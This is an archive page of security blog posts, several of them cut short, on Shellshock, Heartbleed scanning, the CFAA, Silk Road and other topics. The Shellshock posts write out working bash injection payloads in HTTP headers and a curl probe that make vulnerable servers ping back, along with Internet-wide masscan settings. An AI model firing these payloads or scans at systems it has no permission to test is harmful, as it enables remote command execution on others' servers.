Archive

Category Archives for "Security"

Response to Kathy Sierra

People are asking me about this post from Kathy Sierra. It’s inaccurate, twisted, and personally insulting. That Kathy was doxxed and harassed 7 years ago is indeed an awful thing, but it doesn’t justify her own bad behavior toward others.

I always defend targets of lynch mobs, such as accused Boston Bomber Dzhokhar Tsarnaev. To the right is a picture of what appears to be Tsarnaev placing the bomb right behind 9-year-old Martin Richard, who died in the blast. I feel sick to my stomach looking at it. But here’s the thing: Tsarnaev is an American citizen, and I will vigorously defend his right to due process. When they violated his civil rights, interrogating him for days while he hung near death in his hospital bed, begging for a lawyer, I vocally condemned it. All fruits of that interrogation need to be thrown out, even if it means Tsarnaev goes free. And I have no problem saying this to the face of Martin Richard’s parents.

Weev may be a bad human being, but he’s not as vile as a mass bomber. I likewise defend him from lynch mobs. His arbitrary conviction and imprisonment under the CFAA was a gross Continue reading

Technology Short Take #45

Welcome to Technology Short Take #45. As usual, I’ve gathered a collection of links to various articles pertaining to data center-related technologies for your enjoyment. Here’s hoping you find something useful!

Networking

  • Cormac Hogan has a list of a few useful NSX troubleshooting tips.
  • If you’re not really a networking pro and need a “gentle” introduction to VXLAN, this post might be a good place to start.
  • Also along those lines—perhaps you’re a VMware administrator who wants to branch into networking with NSX, or you’re a networking guru who needs to learn more about how this NSX stuff works. vBrownBag has been running a VCP-NV series covering various objectives from the VCP-NV exam. Check them out—objective 1, objective 2, objective 3, and objective 4 have been posted so far.

Servers/Hardware

  • I’m going to go out on a limb and make a prediction: In a few years’ time (let’s say 3–5 years), Intel SGX (Software Guard Extensions) will be regarded as being as important as, if not more important than, the virtualization extensions. What is Intel SGX, you ask? See here, here, and here for a breakdown of the SGX design objectives. Let’s be real—the ability for an Continue reading

Wget off the leash

As we all know, to grab a website with wget, we'll use the "-r" option to "recurse" through all the links. There is also the '-H' option, which means that wget won't restrict itself to just one host. In other words, with '-r -H' together, it'll try to spider the entire Internet. So I did that to see what would happen.

Well, for a 32-bit process, what happened is that after more than a month, it ran out of memory. It maintained an ever-growing list of URLs that it had to visit, which can easily run into the millions. At a hundred bytes per URL and 2 gigabytes of virtual memory, it'll run out of memory after 20 million URLs -- far short of the billions on the net. That's what you see below, where 'wget' has crashed after exhausting memory. Below that I show the command I used to launch the process, starting at cnn.com as the seed with a max timeout of 5 seconds.
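For reference, the invocation described would look something like this (a sketch reconstructed from the description above; the seed URL and 5-second timeout come from the post, the output directory is my own assumption):

```shell
# -r: recurse through links; -H: don't restrict recursion to one host,
# so the crawl spiders outward across the entire Internet.
# --timeout=5: give up on any single fetch after 5 seconds.
# -P crawl: dump everything into a "crawl" directory (assumed, not from the post).
wget -r -H --timeout=5 -P crawl http://www.cnn.com/
```

Run on a 32-bit build, the process's 2GB address space caps the pending-URL list at roughly 20 million entries, which is the crash described above.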



How much data did I download from the Internet? According to 'du', the answer is 18 gigabytes, as seen in the following screenshot:



It reached 79425 individual domains, far short of the millions it held Continue reading

Six-month anniversary scan for Heartbleed

I just launched my six-month anniversary scan for Heartbleed. I'll start reporting early results tomorrow afternoon. I'm dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send your address ranges to our "abuse@" email address. We'll look up the abuse contact email for those ranges and send you what we found for that range. (This offer is good through the end of October 2014.)



Here is a discussion of the options.
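Assembled, the invocation presumably looked something like this (a sketch, not the exact command; the rate, banner, and output flags are my assumptions -- the options themselves are discussed one by one below):

```shell
# Scan the entire IPv4 Internet on port 443, honoring the default
# /etc/masscan/masscan.conf (which holds the exclude ranges).
# --banners/--heartbleed check the heartbeat rather than just the port;
# --rate throttles the scan; -oB records results in binary form.
masscan 0.0.0.0/0 -p443 --banners --heartbleed --rate 10000 -oB heartbleed.scan
```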

--conf /etc/masscan/masscan.conf
You don't see this option, but it's the default. This is where we have the 'excluderanges' configured. Because we exclude everyone who contacts us and opts out of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.

0.0.0.0/0
The "/0" means "the entire Internet". Actually, any valid IPv4 address can replace the 0.0.0.0 and it'll produce the same results, such as "127.0.0.0/0" to amuse your friends.

-p443
This says to scan on port 443, the default SSL port. At some point in Continue reading

Who named “shellshock”?

Because it's terribly important to cybersec, many are debating the origin of the name "shellshock". I thought I'd write up the definitive answer.

The answer is that it came from this tweet by Andreas Lindh. That's the absolute origin of the term. Andreas made it up himself.



Also, to some extent Davi Ottenheimer deserves some credit for starting the conversation among a bunch of people with his tweet saying "it's not big until there's a logo". Lots of people posted logos at that point.

Also to some extent I deserve some credit for then pimping the "shellshock" name in my blogposts, which received a lot of attention in the early hours of the shellshock crisis. As you can see from the pageview stats below, these posts got a lot of attention. Also, most of the early news stories on "real" news websites referenced me and my posts. Those news sites got the name from me, and I got it from Andreas and nobody else.



I suspect what really helped it along is that when I scanned the Internet for the bug, I put it in everybody's webserver logs. I included a pointer to the "shellshock scan" post in the Continue reading

Understanding the HP split

HP is splitting itself into "enterprise" and "consumer" companies. Why the split? Isn't the goal of big companies to get bigger? Well, no, that's just the cynical view of companies. The actual goal is to deliver value to stockholders. Splitting delivers value in two ways. The first is that it "exposes" the underlying business. The second is that it avoids dis-economies of scale.

Conglomerates like GE (General Electric) have a problem. While some businesses do well and grow, other businesses fail and shrink. You can't buy stock in the individual components of GE's business you think are growing, you have to take all or none. GE Medical has been growing fast, but you can't invest in it individually.

Thus, big companies frequently spin out such companies, either to divest themselves of the dead weight that isn't growing, or conversely, to let a growing part of the business fly free without being held back by the dead weight. The fast-growing parts of a business aren't inherently better. They tend to also be riskier, meaning that while their stock may surge, they have an equal probability of going bankrupt soon.

We can see how this philosophy worked in the case of HP's Continue reading

Two Minutes of Hate: Marriott deauthing competing WiFi

Do you stand for principle -- even when it's against your interests? Would you defend the free-speech rights of Nazis, for example? The answer is generally "no"; few people stand for principle. We see that in this morning's news story about Marriott jamming (actually deauthing) portable WiFi hotspots in order to force customers to use its own high-priced WiFi.

The principle I want to discuss here is "arbitrary and discriminatory enforcement". It was the principle behind the Aaron Swartz and Andrew "weev" Auernheimer cases. The CFAA is a vague law under which it is impossible to distinguish between allowed and forbidden behavior. Swartz and Weev were prosecuted under the CFAA not because what they did was "unauthorized access", but because they pissed off the powerful. Prosecutors then interpreted the laws to suit their purposes.


The same thing is true in the Marriott case. Deauthing WiFi is common practice everywhere: at company headquarters, hospitals, and college campuses. They do this for security reasons, to prevent rogue access-points from opening up holes behind the firewall. It's also done at the DefCon conference, to prevent hostile access-points from tricking people by using "DefCon" in their name.

Section 333 of the Communications Continue reading

Opt-in for upcoming Heartbleed results

On October 8, the 6-month anniversary of Heartbleed, I'm going to scan the Internet again for it. I expect to find that about 250k devices are still vulnerable. These are things like webcams, NAS boxes, forgotten VM instances, development machines, and so on -- few real "web servers" will be vulnerable.

I will, of course, exclude from my scan everyone who has asked to be excluded. My scan list is down to only 3.5 billion hosts because of all the exclusions I do. However, asking for whitehats to exclude you from their scans is not a smart security strategy. Therefore, if you are on our exclude list, I suggest you do the reverse: opt back in.

I mention this because we are going to try something new: allow people to opt-in to the results. Send us an email, and we'll send the results of our Heartbleed scan for your address range to the "abuse" address registered for that address range.

Reading the Silk Road configuration

Many of us believe it wasn't the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using "parallel construction", meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn't true.

Today, Brian Krebs released data from the defense team that seems to confirm the "parallel construction" theory. I thought I'd write up a technical discussion of what was found.

The Tarbell declaration


A month ago, the FBI released a statement from the lead investigator, Christopher Tarbell, describing how he discovered the hidden server ("the Tarbell declaration"). This document had four noticeable defects.

The first is that the details are vague. It is impossible for anybody with technical skill (such as myself) to figure out what he did.

The second problem is that some of the details are impossible, such as seeing the IP address in the "packet headers".

Thirdly, he saved none of the forensic data. You'd have thought that, had this been real, he would have at least captured packet logs or even screenshots of what he did. I'm a technical blogger. I document this sort Continue reading

Right-winger explains what’s wrong with ComputerCop

The EFF has a good article on ComputerCop. Police departments have pushed back, saying the EFF is an "ultra-liberal organization that is not in any way credible on this". While it's true the EFF is a bunch of leftists, I'm a right-winger -- and I agree with them in this case. Maybe they'll find my right-wing criticisms of ComputerCop more believable.


The basic issue is that this program isn't "protection", but is instead a "virus". It's the same software hackers use to spy on computers. It's the same software that jealous lovers secretly install on their partner's computer. Some of the copies the police give out will be used for the intended purpose (parents hacking their children's computers), but some copies will also end up in the hands of evil-doers who use it for hacking. When investigating domestic abuse cases over the next few years, police will find their own software on the victim's computer, placed there by the abuser.

Monitoring your child's online activities is a good thing. Hacking your child's computers is probably a bad thing. It's not the sort of activity police departments should be encouraging.

The software maker exploits the fact that rural county sheriffs are Continue reading

Bufferbloat Killed my HTTP Session… or not?

Every now and then I get an email from a subscriber having video download problems. Most of the time the problem auto-magically disappears (and there’s no indication of packet loss or ridiculous latency in traceroute printout), but a few days ago Henry Moats managed to consistently reproduce the problem and sent me exactly what I needed: a pcap file.

TL&DR summary: you have to know a lot about application-level protocols, application servers and operating systems to troubleshoot networking problems.

Read more ...

The shockingly obsolete code of bash

One of the problems with bash is that it's simply obsolete code. We have modern objective standards about code quality, and bash doesn't meet those standards. In this post, I'm going to review the code, starting with the function that is at the heart of the #shellshock bug, initialize_shell_variables().

K&R function headers


The code uses the K&R function headers which have been obsolete since the mid-1980s.


I don't think they're there to support older compilers, because other parts of the code use modern headers. I think they're there simply because the maintainers are paranoid about making unnecessary changes to the code. The effect of this is that it messes up static analysis, both simple compiler warnings and advanced security analysis tools.

It's also a stylistic issue. There's only one rule to coding style, which is "avoid surprising things", and this is surprising.

Ultimately, this isn't much of an issue, but a symptom that there is something seriously wrong with this code.

Global variables everywhere


Global variables are bad. Your program should have a maximum of five, for such things as the global debug or logging flag. Bash has hundred(s) of global variables.


Also note that a large number of Continue reading

Do shellshock scans violate CFAA?

In order to measure the danger of the bash shellshock vulnerability, I scanned the Internet for it. Many are debating whether this violates the CFAA, the anti-hacking law.

The answer is that everything technically violates that law. The CFAA is written so vaguely that it allows discriminatory prosecution by the powerful, such as when prosecutors went after 'weev' for downloading iPad account information that AT&T had made public on its website. Such laws need to be challenged, but sadly, those doing the challenging tend to be the evil sort, like child molesters, terrorists, and Internet trolls like weev. A better way to challenge the law is with a more sympathetic character. Being a good guy defending websites still doesn't justify unauthorized access (if indeed it's unauthorized), but it lends credence to the argument that the law is unconstitutionally vague, because I'm obviously not trying to "get away with something".


Law is like code. The code says (paraphrased):
intentionally accesses the computer without authorization thereby obtaining information
There are two vague items here, "intentionally" and "authorization". (The "access" and "information" are also vague, but we'll leave that for later).


The problem with the law is that it was written in the 1980s before the web Continue reading

Many eyes theory conclusively disproven

Just because a bug was found in open-source does not disprove the "many eyes" theory. Instead, it's bugs being found now that should've been found sometime in the last 25 years.

Many eyes are obviously looking at bash now, and they are finding fairly obvious problems. It's obvious that the parsing code in bash is deeply flawed, though any particular bug isn't so obvious. If many eyes had been looking at bash over the past 25 years, these bugs would've been found a long time ago.

Thus, we know that "many eyes" haven't been looking at bash.

The theory is the claim promoted by open-source advocates that "many eyes makes bugs shallow", the theory that open-source will have fewer bugs (and fewer security problems) since anyone can look at the code.

What we've seen is that, in fact, very few people ever read code, even when it's open-source. The average programmer writes 10x more code than they read. The only people for whom that equation is reversed are professional code auditors -- and they are hired primarily to audit closed-source code. Companies like Microsoft pay programmers to review code because reviewing code is not otherwise something programmers like to do.

From Continue reading

Shellshock is 20 years old (get off my lawn)

The bash issue is 20 years old. By this I don't mean the actual bug is that old (though it appears it might be), but that we've known that long that passing HTTP values to shell scripts is a bad idea.

My first experience with this was in 1995. I worked for "Network General Corporation" (which would later merge with McAfee Associates). At the time, about 1000 people worked for the company. We made the Sniffer, the original packet-sniffer that gave its name to the entire class of products.

One day, the head of IT comes to me with an e-mail from some unknown person informing us that our website was vulnerable. He was in standard denial, asking me to confirm that "this asshole is full of shit".

But no, whoever had sent us the email was correct, and obviously so. I was enough of a security expert that our IT guy would come to me, yet I hadn't considered that bug before (to my great embarrassment). Of course, one glance at the email and I knew it was true. I didn't have to try it out on our website, because it was self-evident in the way that Continue reading

Bash ‘shellshock’ bug is wormable

Early results from my scan: there are about 3000 systems vulnerable just on port 80, just on the root "/" URL, without a Host field. That doesn't sound like a lot, but that's not where the bug lives. Update: oops, my scan broke early in the process and stopped capturing the responses -- it's probably a lot more responses than that.

Firstly, only about 1 in 50 webservers respond correctly without the proper Host field. Scanning with the correct domain names would lead to a lot more results -- about 50 times more.

Secondly, it's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi). Getting just the root page is the thing least likely to be vulnerable. Spidering the site, and testing well-known CGI scripts (like the CPanel one) would give a lot more results, at least 10x.
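A probe of that sort (run only against systems you're authorized to test) is a one-line curl command; the header payload is the same function-definition trick, and the CGI path is the CPanel one mentioned above. The callback address is a placeholder you'd replace with your own:

```shell
# If the CGI script is handled by a vulnerable bash, the trailing command
# after the function definition executes, pinging back to the scanner.
curl -A '() { :; }; ping -c 3 YOUR.CALLBACK.IP' \
  http://target.example/cgi-sys/defaultwebpage.cgi
```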

Thirdly, it's embedded webservers on odd ports that are the real danger. Scanning more ports would give a couple times more results.

Fourthly, it's not just web, but other services that are vulnerable, such as the DHCP service reported in the initial advisory.

Consequently, even though my light scan found only 3000 results, this thing is clearly Continue reading

Bash ‘shellshock’ scan of the Internet

NOTE: malware is now using this as their User-agent. I haven't run a scan now for over two days.

I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72.

The configuration file for masscan looks something like:

target-ip = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74
http-header[Host] = () { :; }; ping -c 3 209.126.230.74
http-header[Referer] = () { :; }; ping -c 3 209.126.230.74

(Actually, these last three options don't quite work due to a bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120)
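On the receiving end, identifying which hosts actually executed the payload is presumably just a matter of watching the pings arrive at the callback address, e.g. something like:

```shell
# Each ICMP echo arriving from a scanned host means its bash parsed the
# injected function definition and ran our "ping home" command.
tcpdump -n icmp and dst host 209.126.230.74
```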

Earlier results show that this bug is widespread:
A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high.


Bash bug as big as Heartbleed

Today's bash bug is as big a deal as Heartbleed. That's for many reasons.

The first reason is that the bug interacts with other software in unexpected ways. We know that interacting with the shell is dangerous, but we write code that does it anyway. An enormous percentage of software interacts with the shell in some fashion. Thus, we'll never be able to catalogue all the software out there that is vulnerable to the bash bug. This is similar to the OpenSSL bug: OpenSSL is included in a bajillion software packages, so we were never able to fully quantify exactly how much software is vulnerable.
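If you want to know whether your own bash is affected, the widely circulated one-liner checks it locally (this is the canonical test for CVE-2014-6271, not something specific to this scan):

```shell
# Define an environment variable whose value is a function definition
# with a trailing command, then invoke bash. A vulnerable bash executes
# the trailing command while importing the variable, printing
# "vulnerable" then "test"; a patched bash prints only "test".
env x='() { :;}; echo vulnerable' bash -c 'echo test'
```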

The second reason is that while the known systems (like your web-server) are patched, unknown systems remain unpatched. We see that with the Heartbleed bug: six months later, hundreds of thousands of systems remain vulnerable. These systems are rarely things like webservers, but are more often things like Internet-enabled cameras.

Internet-of-things devices like video cameras are especially vulnerable because a lot of their software is built from web-enabled bash scripts. Thus, not only are they less likely to be patched, they are more likely to expose the vulnerability to the outside world.

Unlike Heartbleed, which Continue reading

It’s the Applications, Stupid (Part 3 of 3)!

If you missed the first 2 parts of this series, you can catch them here and here. The short version is that there are Enterprise customers that are actively seeking to automate the production deployment of their workloads, which leads them to discover that capturing business policy as part of the process is critical. We’ve arrived here at the point that once policy can be encapsulated in the process of application workload orchestration, it is then necessary to have infrastructure that understands how to enact and enforce that policy. This is largely a networking discussion, and to date, networking has largely been about any-to-any, all-equal connectivity (at least in Data Centers), which in many ways means no policy. This post looks at how networking infrastructure can be envisioned differently in the face of applications that can express their own policy.

[As an aside, Rich Fichera over at Forrester Research wrote a great piece on this topic (which unfortunately is behind a pretty hefty paywall unless you're a Forrester client, but I'll provide a link anyway). Rich coins the term "Systems of Engagement" to describe new models for Enterprise applications that depart from the legacy "Systems of Record." If you have access Continue reading